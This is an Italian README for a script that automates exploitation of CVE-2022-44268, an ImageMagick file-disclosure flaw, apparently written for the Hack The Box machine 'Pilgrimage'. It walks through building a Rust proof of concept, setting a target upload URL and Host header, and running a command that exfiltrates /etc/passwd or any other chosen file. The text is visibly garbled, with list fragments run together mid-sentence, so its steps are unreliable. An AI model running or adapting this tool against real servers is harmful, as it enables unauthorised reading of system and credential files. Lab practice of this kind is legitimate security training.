
Uno script di automazione degli exploit che si basa sul lavoro di Voidzone security.
Questo script automatizza lo sfruttamento di CVE-2022-44268 (divulgazione di file in ImageMagick).
/etc/passwd) come argomento da riga di comando.image.png).exiftool per estrarre e stampare il contenuto del file esfiltrato.requests: pip install requestshttps://git.rotfl.io/v/CVE-2022-44268.gitcargo build nella sua directory.exiftool.wget.git clone https://git.rotfl.io/v/CVE-2022-44268.gitcd CVE-2022-44268cargo buildautomate_exploit.py) DENTRO la directory CVE-2022-44268.Devi modificare lo script Python (automate_exploit.py) per il tuo target. Variabili chiave da cambiare:
payload: Percorso del image.png malevolo generato dal PoC Rust.
"/home/kali/usr/htb/pilgrimage/CVE-2022-44268/image.png""image.png" (poiché lo script viene eseguito dove viene creato image.png).url: L'URL target per il caricamento dell'immagine.
"http://pilgrimage.htb""http://sito-vulnerabile.com/upload").proxies (opzionale): Per instradare il traffico (es. tramite Burp Suite).
{'http': 'http://127.0.0.1:8080'}None se non necessario.Header Host (all'interno del dizionario headers): Deve corrispondere al nome host nella tua url.
'Host': 'pilgrimage.htb'Assicurati di essere nella directory CVE-2022-44268 (dove si trovano automate_exploit.py e il PoC Rust).
Esegui lo script, fornendo il percorso del file target da esfiltrare come argomento:
python3 automate_exploit.py "/etc/passwd"